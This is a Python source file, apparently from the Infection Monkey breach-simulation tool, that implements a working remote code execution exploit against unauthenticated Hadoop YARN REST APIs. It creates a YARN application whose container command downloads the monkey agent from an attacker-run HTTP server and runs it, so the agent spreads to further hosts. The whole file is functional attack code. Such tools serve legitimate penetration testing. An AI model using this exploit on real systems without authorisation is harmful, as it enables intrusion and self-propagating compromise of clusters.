"""
    Remote code execution on HADOOP server with YARN and default settings
    Implementation is based on code from https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
"""

import json
import logging
import posixpath
import random
import string

import requests

from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.model import HADOOP_LINUX_COMMAND, HADOOP_WINDOWS_COMMAND, ID_STRING, MONKEY_ARG

__author__ = 'VakarisZ'

LOG = logging.getLogger(__name__)


class HadoopExploiter(WebRCE):
    _TARGET_OS_TYPE = ['linux', 'windows']
    _EXPLOITED_SERVICE = 'Hadoop'
    HADOOP_PORTS = [["8088", False]]
    # How long we have our http server open for downloads in seconds
    DOWNLOAD_TIMEOUT = 60
    # Random string's length that's used for creating unique app name
    RAN_STR_LEN = 6

    def __init__(self, host):
        super(HadoopExploiter, self).__init__(host)

    def _exploit_host(self):
        # Try to get exploitable url
        urls = self.build_potential_urls(self.HADOOP_PORTS)
        self.add_vulnerable_urls(urls, True)
        if not self.vulnerable_urls:
            return False
        # We presume hadoop works only on 64-bit machines
        if self.host.os['type'] == 'windows':
            self.host.os['machine'] = '64'
        paths = self.get_monkey_paths()
        if not paths:
            return False
        http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths['src_path'])
        command = self.build_command(paths['dest_path'], http_path)
        if not self.exploit(self.vulnerable_urls[0], command):
            return False
        http_thread.join(self.DOWNLOAD_TIMEOUT)
        http_thread.stop()
        self.add_executed_cmd(command)
        return True

    def exploit(self, url, command):
        # Get the newly created application id
        resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"),
                             timeout=LONG_REQUEST_TIMEOUT)
        resp = json.loads(resp.content)
        app_id = resp['application-id']
        # Create a random name for our application in YARN
        rand_name = ID_STRING + "".join([random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)])
        payload = self.build_payload(app_id, rand_name, command)
        resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT)
        return resp.status_code == 202

    def check_if_exploitable(self, url):
        try:
            resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"),
                                 timeout=LONG_REQUEST_TIMEOUT)
        except requests.ConnectionError:
            return False
        return resp.status_code == 200

    def build_command(self, path, http_path):
        # Build command to execute
        monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1,
                                              vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0])
        if 'linux' in self.host.os['type']:
            base_command = HADOOP_LINUX_COMMAND
        else:
            base_command = HADOOP_WINDOWS_COMMAND

        return base_command % {"monkey_path": path, "http_path": http_path,
                               "monkey_type": MONKEY_ARG, "parameters": monkey_cmd}

    @staticmethod
    def build_payload(app_id, name, command):
        payload = {
            "application-id": app_id,
            "application-name": name,
            "am-container-spec": {
                "commands": {
                    "command": command,
                }
            },
            "application-type": "YARN"
        }
        return payload
